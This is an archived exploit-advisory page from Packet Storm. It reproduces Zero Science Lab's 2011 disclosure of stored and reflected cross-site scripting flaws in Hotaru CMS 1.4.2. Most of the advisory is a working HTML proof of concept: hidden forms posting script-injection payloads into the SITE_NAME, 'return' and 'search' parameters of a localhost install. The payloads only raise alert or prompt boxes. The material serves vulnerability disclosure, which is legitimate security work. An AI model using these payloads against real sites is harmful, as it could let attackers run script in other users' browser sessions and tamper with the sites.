what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Hotaru CMS 1.4.2 Cross Site Scripting

Hotaru CMS 1.4.2 Cross Site Scripting
Posted Nov 13, 2011
Authored by LiquidWorm | Site zeroscience.mk

Hotaru CMS version 1.4.2 suffers from multiple cross site scripting vulnerabilities, both reflected and persistent.

tags | exploit, vulnerability, xss
SHA-256 | fa2ef1aad0681d48f3581080ac6a6160c931a45f3967201df13527f13b3c6a67

Hotaru CMS 1.4.2 Cross Site Scripting

Change Mirror Download
<!--

Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability


Vendor: Hotaru CMS
Product web page: http://www.hotarucms.org
Affected version: 1.4.2

Summary: Hotaru CMS is an open source, PHP platform for building
your own websites. With flexible plugins and themes, you can make
any site you like.

Desc: The CMS suffers from multiple XSS vulnerabilities. Input thru
the POST parameters 'SITE_NAME' (stored), 'return' (reflected) and
the GET parameter 'search' (reflected) thru Hotaru.php, are not
sanitized allowing the attacker to execute HTML code into user's
browser session on the affected site.


Tested on: Microsoft Windows XP Professional SP3 (EN)
Apache 2.2.21
MySQL 5.5.16
PHP 5.3.8


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
liquidworm gmail com


Advisory ID: ZSL-2011-5057
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5057.php


12.11.2011

-->


<html>
<title>Hotaru CMS 1.4.2 SITE_NAME Parameter Stored XSS Vulnerability</title>
<body bgcolor="#1C1C1C">
<script type="text/javascript">
function xss1(){document.forms["xss1"].submit();}
function xss2(){document.forms["xss2"].submit();}
</script><br />
<form action="http://localhost/hotaru-1-4-2/admin_index.php?page=settings" enctype="application/x-www-form-urlencoded" method="POST" id="xss1">
<input type="hidden" name="SITE_OPEN" value="true" />
<input type="hidden" name="SITE_NAME" value='"><script>alert(1)</script>' />
<input type="hidden" name="THEME" value="default/" />
<input type="hidden" name="ADMIN_THEME" value="admin_default/" />
<input type="hidden" name="DEBUG" value="true" />
<input type="hidden" name="FRIENDLY_URLS" value="false" />
<input type="hidden" name="DB_CACHE" value="false" />
<input type="hidden" name="CSS_JS_CACHE" value="true" />
<input type="hidden" name="HTML_CACHE" value="true" />
<input type="hidden" name="LANG_CACHE" value="true" />
<input type="hidden" name="RSS_CACHE" value="true" />
<input type="hidden" name="SITE_EMAIL" value="lab@zeroscience.mk" />
<input type="hidden" name="SMTP" value="false" />
<input type="hidden" name="SMTP_HOST" value="mail.zeroscience.mk" />
<input type="hidden" name="SMTP_PORT" value="25" />
<input type="hidden" name="SMTP_USERNAME" value="" />
<input type="hidden" name="SMTP_PASSWORD" value="" />
<input type="hidden" name="settings_update" value="true" />
<input type="hidden" name="csrf" value="48202665ee5176f8a813e4a865381f02" /></form>
<a href="javascript: xss1();" style="text-decoration:none">
<b><font color="red"><center><h3>SITE_NAME Param</h3></center></font></b></a><br />
<form action="http://localhost/hotaru-1-4-2/index.php" enctype="application/x-www-form-urlencoded" method="POST" id="xss2">
<input type="hidden" name="csrf" value="83405717529ac232d387c8df3cdb01d1" />
<input type="hidden" name="page" value="login" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="remember" value="1" />
<input type="hidden" name="return" value="%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" />
<input type="hidden" name="username" value="" /></form>
<a href="javascript: xss2();" style="text-decoration:none">
<b><font color="red"><center><h3>return Param</h3></center></font></b></a><br />
<a href="http://localhost/hotaru-1-4-2/index.php?search=%22%20onmouseover%3dprompt%28111%29%20bad%3d%22" style="text-decoration:none">
<b><font color="red"><center><h3>search Param</h3></center></font></b></a></body>
</html>

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close